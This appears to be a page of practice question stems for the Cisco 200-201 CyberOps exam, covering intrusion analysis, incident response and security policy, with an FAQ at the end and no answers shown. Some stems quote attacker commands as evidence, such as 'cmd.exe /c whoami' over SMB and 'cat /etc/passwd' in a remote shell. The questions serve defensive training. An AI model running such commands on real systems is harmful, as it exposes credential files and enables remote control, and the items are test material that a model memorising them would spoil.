A small retail company uses a cloud-based point-of-sale (POS) system. The IT manager receives an alert from the cloud provider that the POS application is generating an unusually high number of outbound connections to an IP address in a foreign country. The POS application is only supposed to communicate with the cloud provider's servers in the United States. The IT manager checks the POS terminal logs and finds that a new user account was created locally on the terminal with administrative privileges two days ago. The terminal does not have antivirus installed. What should the IT manager do first to contain the incident and prevent data loss?

Easy
781

An intrusion detection system (IDS) generates an alert for a packet containing the string '/etc/passwd'. What type of attack is likely detected?

Easy
782

Which TWO of the following are indicators of a network intrusion? (Choose two.)

Medium
783

A SOC analyst is reviewing DNS logs and suspects that a host is communicating with a domain generation algorithm (DGA) used by malware. Which TWO characteristics in the DNS logs would most strongly support this suspicion? (Choose two.)

Medium
784

A network security analyst is examining a packet capture in Wireshark and notices a series of TCP packets with the PSH, ACK flags set, and a payload containing the string 'cmd.exe /c whoami'. The packets are destined to port 445 on an internal server. Which type of malicious activity is most likely indicated?

Hard
785

A SOC analyst is investigating a suspected data exfiltration event on a corporate network. The analyst runs a Wireshark display filter on a captured PCAP and sees a large volume of outbound packets from an internal workstation to an external IP address, all with the same destination port and with the TCP PSH flag set on nearly every packet. The payloads are small but consistently sized, and the transfer continues for over 30 minutes. Which statement best explains why this traffic pattern is suspicious in the context of network intrusion analysis?

Medium
786

A financial services firm is building a threat model and wants to classify an attacker who is highly skilled, well funded, and focused on stealing intellectual property from a specific set of companies over a long period. Which threat actor category best fits this profile?

Hard
787

An analyst is examining a Windows system for evidence of malware that maintains persistence by modifying the Image File Execution Options (IFEO) registry key. Which of the following best describes how this technique works?

Medium
788

An organization wants to ensure that a user cannot deny having sent an email. Which security goal does this address?

Hard
789

Refer to the exhibit. An analyst sees this syslog message from a Cisco ASA. What does this log entry indicate?

Medium
790

During the Containment, Eradication, and Recovery phase, the incident response team collects evidence from a compromised system. Which document is used to record the chain of custody?

Medium
791

A threat hunter identifies a binary that uses a Domain Generation Algorithm (DGA) to create domain names like 'eksdghf23.com', 'mzncxv89.net' each day. The malware contacts these domains over HTTPS. Which phase of the Cyber Kill Chain is most directly associated with this technique?

Hard
792

A company's security policy requires that sensitive data be encrypted at rest using AES-256. Which type of encryption does AES-256 represent?

Medium
793

A junior analyst is asked to determine which log source would best reveal an attacker attempting to authenticate to a Windows file server with stolen credentials over the network. Which source should the analyst consult first?

Easy
794

An analyst is investigating a potential data exfiltration incident. The only available data is NetFlow records from Cisco routers. Which NetFlow field would be most useful to identify large outbound transfers to an unusual external host?

Hard
795

An analyst is investigating lateral movement and observes SMB authentication attempts from host A to multiple other hosts using NTLM authentication with a hash value instead of a password. Which attack technique is most likely being used?

Hard
796

An analyst is reviewing Windows Event Logs and finds Event ID 4648. What does this event typically indicate?

Medium
797

Which TWO actions are characteristic of a port scan performed by an attacker? (Choose two.)

Easy
798

A security analyst discovers that a malicious actor is using a technique to gather information about employees by searching social media sites. Which type of attack is being performed?

Easy
799

An attacker intercepts communication between a client and a server, allowing the attacker to read, insert, and modify messages in both directions. Which type of network attack is this?

Hard
800

A threat hunter is examining a Linux web server that is suspected of being compromised. The hunter wants to identify suspicious processes that may be communicating with external command-and-control infrastructure and to understand what files those processes have open. Which TWO artifacts or commands should the hunter use to accomplish these goals? (Choose two.)

Medium
801

A SOC analyst is reviewing proxy logs and wants to identify indicators of potential data exfiltration over HTTP. Which two patterns should the analyst treat as suspicious? (Choose two.)

Hard
802

During network intrusion analysis, an analyst observes a TCP connection with the SYN flag set but no subsequent ACK. This pattern is indicative of:

Easy
803

A SOC Tier 1 analyst receives an alert for a potential malware infection. What is the primary responsibility of the Tier 1 analyst?

Easy
804

A SOC Tier 3 analyst is performing advanced threat analysis. Which TWO activities are typical for this tier?

Medium
805

A NetFlow analysis shows that a single internal IP sent 10 GB of data to an external IP within one hour, whereas the baseline for that host is typically 100 MB per day. Which type of activity does this indicate?

Medium
806

An analyst is investigating a Linux web server that is exhibiting unusual outbound network traffic. The analyst runs 'lsof -i' and notices that the process 'apache2' has an established connection to an external IP address on port 4444. Further investigation shows that a file named 'update.php' in the web root contains obfuscated code. Which type of compromise does this most likely represent?

Medium
807

A security analyst is investigating a Linux server that is exhibiting unusual outbound network traffic. The analyst runs 'netstat -tulpn' and observes a listening service on TCP port 4444, but the process name is 'sshd'. The analyst knows that SSH normally listens on port 22. Which of the following is the most likely explanation for this finding?

Hard
808

A security analyst is reviewing Zeek connection logs and sees the following entry: '192.168.1.10:12345 > 10.0.0.1:80 (tcp) duration 0.001 sec, service http, bytes 60, state S0'. Based on the state 'S0', what does this indicate about the connection?

Hard
809

Which TWO of the following are typical indicators of a C2 beaconing communication?

Easy
810

An analyst is reviewing Windows Event Logs and sees Event ID 4625. What does this event indicate?

Easy
811

An organization is conducting a risk assessment and wants to assign numerical values to the likelihood and impact of risks. Which type of risk assessment is being performed?

Hard
812

An analyst is investigating a Windows system where a suspicious executable is running. Using Process Explorer, the analyst observes that the process 'svchost.exe' has a parent process of 'cmd.exe'. What is the significance of this parent-child relationship?

Medium
813

A security analyst is examining a Windows 10 host that is suspected of being compromised. The analyst runs `wmic process get name,processid,executablepath,commandline` and notices a process named `svchost.exe` with an executable path of `C:\Users\Public\svchost.exe`. Which conclusion is most accurate?

Hard
814

A security analyst is investigating an incident where an employee received an email that appeared to be from the company's IT department, requesting the employee to verify their account by clicking a link and entering their credentials. The employee complied, and later the attacker used those credentials to access the corporate VPN. Which combination of attack types best describes this incident?

Hard
815

An analyst investigates a suspected data exfiltration event and captures outbound traffic from a compromised host. The traffic uses HTTPS to an unfamiliar external domain and shows consistent large uploads at regular intervals. Which two indicators would most strongly support the conclusion that this is automated exfiltration rather than normal user browsing? (Choose two.)

Medium
816

During a security audit, an analyst discovers that several employees have shared their login credentials with colleagues to expedite work. Which policy enforcement mechanism would be most effective in preventing this behavior?

Easy
817

In the Cyber Kill Chain, which phase involves sending a malicious attachment to a targeted user?

Easy
818

A security analyst is reviewing the organization's password policy. The policy currently requires passwords to be at least 8 characters and changed every 60 days. The analyst recommends aligning with NIST SP 800-63B guidelines. Which change should the analyst recommend?

Easy
819

A change management policy requires that all network configuration changes be approved by a change advisory board (CAB) before implementation. An urgent security vulnerability requires an immediate firewall rule change to block an active exploit. What should the network administrator do?

Medium
820

Refer to the exhibit. A security analyst notices repeated login failures. According to the company's security policy, what action should be taken?

Medium
821

During the Cyber Kill Chain, which phase involves sending a malicious attachment to a target user via email?

Easy
822

An analyst examining a PCAP sees an internal host sending ICMP echo requests where the payload length is consistently 1,100 bytes and the payload bytes change on every packet, while the destination is an external IP that returns echo replies of normal size. The host has no monitoring tool installed and no legitimate reason to send large ICMP. Which technique is most likely being used?

Hard
823

A security manager is preparing an incident response plan for a retail company. The plan must define how the organization will handle incidents consistently and must satisfy auditors. Which TWO elements are essential components of an incident response policy? (Choose two.)

Hard
824

A security analyst is using Zeek to analyze network traffic. Which Zeek log would be most useful for identifying HTTP requests to a known malicious domain?

Medium
825

A security operations center is building detection rules for man-in-the-middle attacks on its internal network. The team wants to identify techniques an attacker on the same Layer 2 segment could use to intercept or redirect traffic between two hosts. (Choose two.)

Medium
826

A security analyst discovers that an attacker used a publicly available tool to scan a company's network for open ports and services. What type of attack is this?

Easy
827

A security analyst is reviewing an incident in which an attacker gained initial access to a corporate workstation by exploiting a vulnerability in a browser plugin. After gaining access, the attacker moved laterally to a file server and exfiltrated data. The analyst must map these activities to the cyber kill chain. Which phase of the kill chain does the browser plugin exploitation represent?

Hard
828

A security analyst is evaluating the security posture of a new web application. The analyst needs to identify which TWO of the following are examples of security controls that fall under the category of technical controls. (Choose two.)

Medium
829

An analyst is reviewing web server logs and sees the following entries: 'GET /admin/login.php HTTP/1.1' returning 404, followed by 'GET /admin/login.html' returning 404, then 'GET /admin/login.asp' returning 200. Which TWO observations are most relevant?

Hard
830

An organization implements encryption for all sensitive data at rest and in transit to prevent unauthorized access. Which element of the CIA triad is being primarily addressed?

Easy
831

A SOC analyst is reviewing network telemetry from Cisco Stealthwatch and notices a host inside the corporate network initiating repeated outbound connections to a single external IP address. Each connection is short-lived (less than 5 seconds) and occurs at irregular intervals, with varying destination ports. The analyst suspects command-and-control activity. Which approach would best confirm this suspicion using available telemetry?

Medium
832

A financial institution must comply with PCI DSS requirements for handling cardholder data. A security administrator is asked to implement the control that directly addresses the requirement to protect stored cardholder data. Which technology should the administrator deploy to meet this specific PCI DSS requirement?

Easy
833

A security policy requires that all changes to firewall rules be approved by two administrators. This is an example of which security principle?

Medium
834

A company's security policy states that all remote access must be through a VPN. An employee complains that the VPN is too slow and asks for an exception to access a specific internal server directly over the internet. What should the security analyst recommend?

Medium
835

A network analyst notices a high volume of traffic from a single external IP address to multiple internal hosts on port 443. The traffic includes incomplete TCP handshakes. Which type of reconnaissance is being performed?

Medium
836

A network administrator is creating a baseline for normal traffic patterns. Which of the following should be considered typical for a web server during business hours?

Medium
837

An incident responder is analyzing a Windows machine for evidence of malware persistence. Which TWO registry keys are commonly abused to achieve automatic execution at user logon?

Medium
838

After containing a security incident, the incident response team eradicates the malware and restores systems from clean backups. Which phase of the NIST SP 800-61 Rev 2 process does this represent?

Medium
839

In Wireshark, an analyst follows a TCP stream and sees plaintext usernames and passwords. Which protocol is likely in use?

Medium
840

An analyst detects multiple SMB authentication attempts from a single internal host to several other internal hosts using NTLM hashes instead of plaintext passwords. Which technique is most likely being used?

Medium
841

A junior analyst is reviewing a packet capture and sees a workstation repeatedly sending ICMPv4 Type 8 packets to an external IP address with varying payload sizes. The analyst wants to confirm whether this activity is a covert channel. Which characteristic of the ICMP traffic would most strongly suggest that the ICMP payload is being used to exfiltrate data?

Easy
842

A security analyst is reviewing the risk associated with a new cloud service. The service provider stores data in multiple countries, and the data includes personal information of EU citizens. The analyst must ensure compliance with GDPR. Which principle of GDPR is most directly relevant to this scenario?

Medium
843

An analyst is examining a Linux system for persistence mechanisms. Which of the following files should be reviewed to detect cron-based persistence?

Medium
844

In the context of risk management, which term describes the risk that remains after implementing security controls?

Easy
845

An attacker sends an email posing as the company's IT department, asking employees to click a link and enter their credentials. Which type of social engineering attack is this?

Medium
846

A threat hunter reviews Cisco Stealthwatch flow data and sees an internal server sending periodic 300-byte outbound flows to an external IP every 60 seconds, with consistent packet sizes and no matching inbound response beyond TCP acknowledgments. The server's DNS queries for that IP resolve through a newly registered domain. Which monitoring approach best characterizes this activity as beaconing rather than normal application traffic?

Hard
847

Which component of the NIST Cybersecurity Framework involves taking action to stop an ongoing attack?

Easy
848

A Zeek connection log shows a high number of connections from a single internal IP to many different external IPs on port 25, with small payload sizes. Which behavior is most likely indicated?

Hard
849

A security analyst is investigating a host that is suspected of being used as a pivot point in a network intrusion. The analyst needs to identify which process initiated an outbound connection to a known malicious IP address. Which host-based analysis approach should the analyst use to correlate the network connection to the specific process?

Medium
850

A security auditor reviews a company's security policies and finds that the password policy requires a minimum length of 8 characters and complexity including uppercase, lowercase, digit, and special character. However, the policy does not mandate password expiration. Which of the following is the most significant risk due to this omission?

Hard
851

During an intrusion analysis, a SOC analyst reviews logs showing an outbound connection from an internal host to an external IP at 03:00 AM every 60 seconds. The traffic is HTTPS to a suspicious domain with a high entropy name. Which phase of the Cyber Kill Chain does this activity represent?

Medium
852

A security analyst is triaging an alert about a user downloading a suspicious file. According to the NIST SP 800-61 Rev 2 incident response process, in which phase does initial triage occur?

Easy
853

You are a security operations analyst for a medium-sized enterprise. The company's security policy requires that all endpoint devices have antivirus software installed and updated. During a routine check, you find that a group of 50 laptops used by the sales team have not received antivirus updates for over three months. The policy also states that any non-compliant devices must be quarantined from the network until they are remediated. The sales team manager argues that quarantining the laptops will disrupt critical sales activities. The company's incident response policy has a clause that allows for temporary exceptions in business-critical situations, but requires approval from the CISO. What is the best course of action?

Medium
854

A security analyst is reviewing the organization's security policies and notices that the Acceptable Use Policy (AUP) is outdated. The analyst is asked to identify key elements that should be included in an effective AUP. Which two elements are essential components of an AUP? (Choose two.)

Medium
855

A security policy mandates that all network devices must have logging enabled and that logs must be reviewed regularly. Which TWO practices are essential for effective log review?

Medium
856

During an incident response, an analyst checks for persistence mechanisms and finds an entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. What is the most likely purpose of this registry key?

Medium
857

Which THREE are essential components of a security monitoring strategy? (Choose three.)

Medium
858

An organization's data classification policy defines four levels: Public, Internal, Confidential, and Restricted. An employee accidentally sends an email containing customer payment card information (PCI) to the entire company mailing list. The data should have been classified as which level?

Easy
859

An organization must comply with a regulation that requires protecting the privacy of EU citizens' personal data. Which compliance framework applies?

Hard
860

During an incident investigation, the IR team collects evidence from a compromised server. The evidence must be admissible in court. Which documentation is essential to maintain the chain of custody?

Hard
861

A security analyst is reviewing a Wireshark capture and notices a large number of TCP SYN packets sent to multiple ports on a single host from the same source IP. Which type of network activity is most likely being observed?

Easy
862

A security analyst is investigating a potential brute force attack. Which SIEM correlation rule would best detect this activity?

Medium
863

An analyst suspects a Windows workstation is beaconing to a command-and-control server. The host's DNS cache contains an entry for a domain that resolves to an IP address, but the analyst cannot find any active network connection or process associated with that domain. Which Windows artifact should the analyst examine to determine whether a process previously resolved this domain and when?

Medium
864

A SIEM correlation rule triggers an alert when more than 10 failed login attempts from the same source IP occur within 60 seconds. Which attack is this rule designed to detect?

Medium
865

Which Linux log file is most appropriate for reviewing failed SSH login attempts?

Medium
866

A security analyst is using Cisco Umbrella and notices a high volume of DNS queries from a single internal host to randomly generated domain names that do not resolve. The queries are for domains like 'a1b2c3d4.com', 'e5f6g7h8.net', etc. What type of malicious activity is most likely occurring?

Hard
867

Which THREE are required steps in a proper incident response procedure? (Choose three.)

Hard
868

An analyst is triaging an alert generated by Cisco Secure Network Analytics (Stealthwatch) showing a host inside the network communicating with a known command-and-control IP. The analyst wants to determine whether the communication has already resulted in data theft. Which additional telemetry source would provide the most direct evidence of successful exfiltration?

Hard
869

Refer to the exhibit. A Windows security log shows several events with Event ID 4625 (failed logon). What type of attack is indicated?

Easy
870

An analyst is examining a PE file and notices that the 'TimeDateStamp' in the optional header is 0x00000000. What does this suggest?

Medium
871

A security analyst is investigating an alert from a Windows system log that shows multiple failed logon attempts for the same user account within a short period, followed by a successful logon. Which type of attack does this pattern suggest?

Easy
872

Which of the following is a primary goal of the CIA triad?

Easy
873

Which TWO are best practices for managing SIEM alerts to reduce false positives? (Choose two.)

Hard
874

A junior analyst is asked to review a Linux server for evidence of unauthorized access. They want to see a chronological record of authentication-related messages, including successful and failed logins, generated by the system's authentication services. Which file should the analyst examine?

Easy
875

An intrusion analyst is analyzing a series of alerts from a network-based IDS. The alerts are triggered by the signature 'OVERFLOW-ICMP-ECHO' with a payload size of 65535 bytes. The source IP is a trusted internal server. What is the most likely explanation?

Hard
876

A network security analyst is reviewing firewall logs and sees repeated denied inbound connection attempts from various external IP addresses to TCP port 3389 on several internal hosts. Which type of activity does this most likely represent?

Easy
877

Refer to the exhibit. Based on the intrusion event, what is the likely intent of the traffic?

Hard
878

A security policy states that all portable media must be encrypted. An employee loses a USB drive containing customer data. The drive was encrypted with AES-256. Which of the following is true regarding policy compliance?

Hard
879

A network security analyst is configuring a SPAN session on a Cisco switch so that a Cisco Firepower sensor can inspect traffic between the internal user VLAN and the internet-facing router. The switch has a single physical uplink carrying that traffic. Which configuration goal must the analyst keep in mind to ensure the sensor receives complete sessions?

Easy
880

An analyst notices repeated failed SSH attempts from an external IP to a server. The analyst wants to quickly see all SSH-related events from that IP in the last hour. Which approach is most efficient?

Easy
881

A NetFlow analysis shows a single internal host communicating with many external IP addresses on port 443, but the traffic volumes are very low (small packets). What is the most likely explanation?

Easy
882

In the OSI model, which layer is primarily targeted by a SYN flood attack?

Easy
883

A Linux analyst wants to identify all listening TCP ports on a system. Which command is most appropriate?

Easy
884

In a PKI, what is the role of a Certificate Authority (CA)?

Hard
885

A network engineer is deploying a Cisco Next-Generation IPS (NGIPS) in inline mode. The security team wants to ensure that the device can block malicious traffic while also providing contextual information about the attack. Which of the following Cisco NGIPS features provides detailed information about the attack and the target, including vulnerability mapping?

Hard
886

A NetFlow report shows that host 10.0.0.5 has sent 1 GB of data to external IP 198.51.100.10 over port 443 in the last hour, while other hosts average 100 MB. This anomaly is most indicative of:

Hard
887

An analyst is examining network alerts for lateral movement. Which TWO of the following are typical indicators of lateral movement using SMB?

Medium
888

Which protocol and port combination is commonly used for secure remote administration of network devices?

Easy
889

An analyst is investigating an incident and needs to determine the source of a piece of malware. The analyst finds that the malware uses a domain generation algorithm to contact command-and-control servers. Which term best describes this capability?

Medium
890

A security analyst observes a NetFlow record showing a single internal IP communicating with many external IPs on port 445 within seconds. This pattern is indicative of:

Medium
891

A SOC analyst reviewing a packet capture notices that a single internal host has initiated hundreds of short-lived TCP sessions to the same external web server over the past hour, and every session completed a full three-way handshake before being torn down with FIN/ACK. No single session transferred more than a few kilobytes. Which traffic characteristic should the analyst use to classify this activity?

Medium
892

Which THREE of the following are common types of malware?

Medium
893

During an incident response, an analyst finds evidence of lateral movement. Which THREE of the following are common techniques used for lateral movement?

Hard
894

An analyst reviews an alert that triggered on a network signature for 'shellcode' in a payload. The payload contains a sequence of NOP sleds followed by executable code. Which type of exploitation technique does this indicate?

Medium
895

An organization is developing an Acceptable Use Policy (AUP). Which of the following topics is typically covered in an AUP?

Medium
896

Which best practice helps ensure accurate network intrusion analysis when reviewing logs from multiple sources?

Easy
897

During PCAP analysis, a security analyst observes the following pattern: a series of TCP SYN packets to multiple ports on a target, followed by RST packets from the target for closed ports. Which TWO characteristics describe this scan?

Hard
898

A company is developing a new security policy for cloud storage. Which principle should be the foundation of the policy to ensure data confidentiality and integrity?

Medium
899

A security analyst detects a host infected with ransomware on the corporate network. According to incident response procedures, what should be the first action?

Easy
900

During a security incident, the incident handler identifies that the breach involves personally identifiable information (PII) of customers. Which role is primarily responsible for determining if legal notification requirements apply?

Medium
901

Which data source provides the most detailed information about the application layer payload in network traffic?

Easy
902

An analyst notices that a DNS query for 'www.attacker.com' contains a long subdomain with Base64-encoded data. This activity is observed every 5 minutes. What exfiltration technique is most likely in use?

Medium
903

A security analyst needs to verify that a downloaded software update has not been tampered with. The update's publisher provides a file containing a hash value. Which process should the analyst use to verify integrity?

Hard
904

An organization is developing a new cloud-based application. The security policy requires that all data be encrypted in transit and at rest. Which combination of controls meets this requirement?

Hard
905

A security analyst at a financial services company is reviewing the organization's security program. The CISO wants to ensure that the confidentiality, integrity, and availability of information assets are protected by administrative, physical, and technical controls. Which security concept is the CISO describing?

Easy
906

A security analyst is investigating a network breach. Which TWO activities are examples of passive reconnaissance? (Choose two.)

Medium
907

A healthcare organization uses an online patient portal where patients can view their medical records. Recently, it was discovered that patient records were being modified by an unauthorized insider, and the system suffered a ransomware attack that encrypted the database, making it inaccessible for three days. Which TWO security principles were primarily violated? (Choose two.)

Easy
908

An organization is required to protect cardholder data. Which compliance framework applies to this requirement?

Medium
909

A security policy requires that all data at rest be encrypted. Which TWO of the following are considered best practices for implementing encryption?

Medium
910

An analyst inspects a PCAP and finds a TCP stream where the client and server exchange data in alternating small chunks, each packet's payload is roughly 40 to 60 bytes, and the conversation lasts over two hours with consistent inter-packet delays of about ten seconds. The destination port is 443 but the payload is not TLS. Which conclusion is best supported?

Hard
911

You are a SOC analyst monitoring traffic on a corporate network. The network uses a next-generation firewall (NGFW) with intrusion prevention system (IPS). You receive an alert that the IPS detected a SQL injection attempt against the internal web application server (10.0.1.10) from an external IP (203.0.113.5). The IPS action was set to "alert" only, not "drop". Further investigation shows that the web server logs indicate the SQL injection succeeded and data was exfiltrated to 203.0.113.5. The web application is a custom application developed in-house. The database server (10.0.1.20) contains customer PII. Which of the following is the BEST immediate action to contain the incident?

Medium
912

A SOC analyst is correlating multiple data sources after a suspected web application compromise on an internet-facing server. The analyst has access to web server logs, firewall logs, and endpoint detection and response (EDR) telemetry. Which TWO log sources or record types would most directly help identify the initial exploitation attempt and the subsequent post-exploitation activity? (Choose two.)

Hard
913

A SOC Tier 2 analyst is investigating an alert that was escalated from Tier 1. The analyst suspects the malware is using a new variant of ransomware. What is the most appropriate next step for the Tier 2 analyst?

Medium
914

A junior analyst is triaging a Windows workstation that users report is running slowly. The analyst suspects a malicious process is persisting by masquerading as a legitimate Windows service. Which built-in Windows tool should the analyst use to view services, their binary paths, and their current state without installing additional software?

Easy
915

Which TWO of the following are indicators of a potential data exfiltration attempt?

Medium
916

An analyst is investigating a Linux host and runs 'cat /proc/1234/cmdline'. What information does this provide?

Medium
917

After a security incident, the IR team holds a lessons learned meeting. Which THREE activities are part of the Post-Incident Activity phase?

Medium
918

A SOC analyst is correlating events in the SIEM after an alert fired for suspicious PowerShell execution on a workstation. The analyst wants to identify additional evidence that would support a ransomware pre-encryption hypothesis. Which two telemetry findings would most strongly support that hypothesis? (Choose two.)

Medium
919

An analyst is examining a suspicious PE file. The file's entropy is very high (close to 8.0) and the import table is almost empty. What does this indicate?

Hard
920

An analyst is investigating a suspected FTP brute-force attack. The logs show numerous failed login attempts from a single external IP to multiple user accounts on an internal FTP server. Which two additional pieces of evidence would best confirm a brute-force attack? (Choose two.)

Medium
921

A security analyst at a financial firm is investigating a potential data breach. The company uses Cisco Firepower NGFW and Stealthwatch for network visibility. Over the past week, an internal server with IP 10.10.10.50 has been sending large amounts of data to an external IP 203.0.113.55 on TCP port 443. The Stealthwatch flow records show that the server typically communicates with only internal hosts and a few known external update servers. The analyst checks the Firepower events and sees no alerts for this traffic. The server is running a custom web application that handles financial transactions. The analyst suspects data exfiltration. What should the analyst do next?

Hard
922

Which port is used by RDP (Remote Desktop Protocol) and is a common target for brute force attacks?

Easy
923

An analyst uses Volatility's pstree plugin on a memory dump. The output shows that process 'winlogon.exe' has a child process 'cmd.exe' that is not typical. What is the most likely explanation?

Hard
924

During a forensic examination of a Linux system, an analyst wants to check for persistence mechanisms. Which file or directory should be examined to find user-specific cron jobs that may have been added by an attacker?

Hard
925

A security analyst is reviewing the organization's business continuity plan (BCP) after a recent power outage disrupted operations. The analyst notes that the plan includes an alternate processing site and a backup generator but lacks other key components. Which TWO additional elements should the analyst recommend including to improve the BCP? (Choose two.)

Medium
926

A company's security policy requires that privileged accounts use multi-factor authentication for all administrative access. An auditor finds that a database administrator logs in with a username and password only, then uses a shared service account with a static password for automation. Which policy violation represents the greater risk to the organization?

Hard
927

An analyst is reviewing a Windows event log and sees Event ID 4625 repeated many times for the same user account from different source workstations within a short period. Which activity does this most likely indicate?

Easy
928

During a vulnerability assessment, a security team discovers that a web application allows users to upload files without proper validation. An attacker could upload a malicious file and execute it on the server. Which type of vulnerability is this?

Hard
929

An analyst is investigating a Windows host that likely has malware persistence via the registry. Which TWO registry hives are commonly used to store Run keys for user logon persistence? (Select 2)

Medium
930

Which THREE are common indicators of a distributed denial-of-service (DDoS) attack? (Choose three.)

Hard
931

A security operations center analyst is reviewing a vulnerability scan report for a web server. The report identifies that the server is running an outdated version of Apache HTTP Server with a known remote code execution vulnerability. The analyst needs to classify this finding. Which term best describes this vulnerability?

Medium
932

A network administrator is tasked with creating a security policy for handling sensitive data. Which of the following is the most critical element to include?

Easy
933

In Windows, prefetch files (C:\Windows\Prefetch\*.pf) are used by the system to speed up application loading. How can an analyst leverage prefetch files during host-based analysis?

Medium
934

A security analyst is reviewing PCAP data and sees a TCP stream with interactive shell commands such as 'whoami', 'ls -la', and 'cat /etc/passwd'. The session appears to be bidirectional with a remote IP. Which type of attack is most likely occurring?

Medium
935

An analyst is investigating a Windows host for malware persistence. Which TWO registry locations are commonly abused for persistence by modifying the 'Run' key? (Select TWO)

Medium
936

Which tool can be used to extract files from a PCAP file for further analysis?

Medium
937

An analyst is reviewing IDS alerts and sees an alert with signature name 'ET POLICY Suspicious inbound to MySQL port 3306'. The source IP is external and destination is an internal database server. What is the best immediate action?

Medium
938

A security engineer is setting up a Snort rule to detect FTP traffic where the source IP is not from the internal network. Which Snort rule header correctly specifies the action, protocol, source, and destination?

Medium
939

Which of the following is the CORRECT order of the NIST SP 800-61 Rev 2 incident response lifecycle phases?

Easy
940

Which TWO are common sources of security event data in a Security Information and Event Management (SIEM) system?

Easy
941

During which phase of the NIST SP 800-61 Rev 2 incident response process would the incident response team conduct initial triage and determine whether an event qualifies as an incident?

Easy
942

An analyst is investigating a potential compromise using Indicators of Compromise (IoCs). Which TWO of the following are valid types of IoCs?

Medium
943

An analyst sees a Snort alert with the message 'ET POLICY Outbound connection to known malicious IP'. What does this indicate?

Medium
944

A network administrator configures an IPS to drop packets that match a signature for SQL injection. However, legitimate web traffic is being blocked. What is the most likely cause?

Medium
945

A SIEM correlation rule triggers when a user account is created and then added to a privileged group within 10 minutes. Which activity does this rule detect?

Hard
946

A SOC analyst is tuning Cisco Firepower intrusion policies and reviewing alert metadata to prioritize response. Which TWO alert attributes most directly indicate that a detected event represents a successful compromise rather than a blocked attempt? (Choose two.)

Medium
947

An analyst needs to establish a normal traffic pattern baseline for the network. Which activity is most appropriate for this purpose?

Easy
948

Which security policy defines the process for reporting discovered security vulnerabilities to the organization?

Easy
949

Which TWO characteristics are typical of host-based intrusion detection systems (HIDS) compared to network-based intrusion detection systems (NIDS)?

Hard
950

An organization wants to protect sensitive data at rest and in transit. Which THREE cryptographic methods can provide confidentiality? (Choose three.)

Medium
951

An analyst is investigating a Windows workstation that exhibits suspicious outbound network traffic. The analyst suspects a malicious process is injecting code into a legitimate process. Which of the following Windows Event Log sources would MOST likely contain evidence of process creation and image loading that could reveal the injection?

Hard
952

A network analyst is reviewing firewall logs and sees repeated inbound connections from a single external IP to TCP port 445 on multiple internal hosts over a short period. The connections are followed by SMB negotiation attempts. Which activity does this most likely represent?

Easy
953

A financial services firm must retain security audit logs for a period specified by its regulator and be able to produce them during an examination. Which action BEST ensures the logs remain trustworthy and available for that purpose?

Medium
954

Which two Sysmon Event IDs are most commonly associated with code injection techniques?

Easy
955

An analyst detects traffic from an internal host that periodically sends small DNS queries to a domain with high entropy subdomains (e.g., 'a3k9f2.example.com'). The domain is not on any blocklist, and the query intervals are consistent every 60 seconds. Which technique is most likely being used?

Medium
956

A retail company is updating its security policy framework and needs to align its security controls with a widely recognized U.S. federal standard. The company wants a publication that provides a comprehensive catalog of security and privacy controls for federal information systems and organizations. Which NIST publication should the security team reference?

Medium
957

A security analyst receives an alert for a known malware signature in an outbound file transfer. After investigation, the file is confirmed as benign software. This alert is classified as:

Easy
958

An organization is implementing a threat intelligence sharing program. They want to exchange both structured indicators and full reports with other members of their ISAC. Which combination of standards/protocols should they choose? (Choose two.)

Hard
959

An analyst is triaging a host that antivirus flagged for a file named svchost.exe running from C:\Users\Public\Downloads. The file has a valid digital signature issued to a legitimate software publisher, and the hash matches a known-good installer component. The process is making outbound SMB connections to several internal servers. Which action best reflects sound security monitoring practice?

Hard
960

A security analyst is creating a network baseline for normal traffic patterns. Which TWO metrics should be included to detect anomalies?

Easy
961

An attacker sends a fraudulent email that appears to come from the company's IT department, requesting that the recipient click a link and enter their login credentials. Which type of social engineering attack is this?

Medium
962

Which compliance standard specifically applies to organizations that handle credit card information?

Medium
963

An analyst observes an alert triggered by a single SYN packet to a closed port. The packet did not complete a TCP handshake. What type of attack does this most likely indicate?

Easy
964

A security engineer is analyzing a recent data breach. Which TWO are examples of active reconnaissance techniques? (Select two.)

Medium
965

During an incident response, an analyst identifies a PCAP containing an HTTP POST request to a suspicious external IP with a large payload. The response is not typical for web applications. What type of activity is most likely occurring?

Medium
966

A security analyst notices repeated failed login attempts from a single IP address against multiple user accounts. What is the best immediate action to take?

Easy
967

A company is implementing a new data classification policy. The policy defines three levels: Public, Internal, and Confidential. An employee accidentally emails a spreadsheet marked 'Confidential' to an external partner. The email system automatically encrypts all outbound emails containing 'Confidential' classification. Which security control is being demonstrated?

Hard
968

An analyst is analyzing a PCAP and sees multiple ICMP port unreachable responses from a target host when scanning UDP ports. What does this indicate about the scanned ports?

Medium

Frequently asked questions

What does the scenario questions domain cover on the 200-201 exam?
scenario questions questions test whether you can apply the concept in context, not just recognise a definition.
How many questions are in this domain?
This page lists all 968 scenario questions questions in the 200-201 question bank. The actual exam draws from this domain proportionally to its weighting in the official exam blueprint.
What is the best way to practise this domain?
Start with a short focused session (10 questions) to identify gaps, then work through explanations. Repeat with a longer session once the weak areas feel solid.
Can I practise only scenario questions questions?
Yes — the session launcher on this page filters questions to this domain only. Choose any session length for inline explanations and scoring.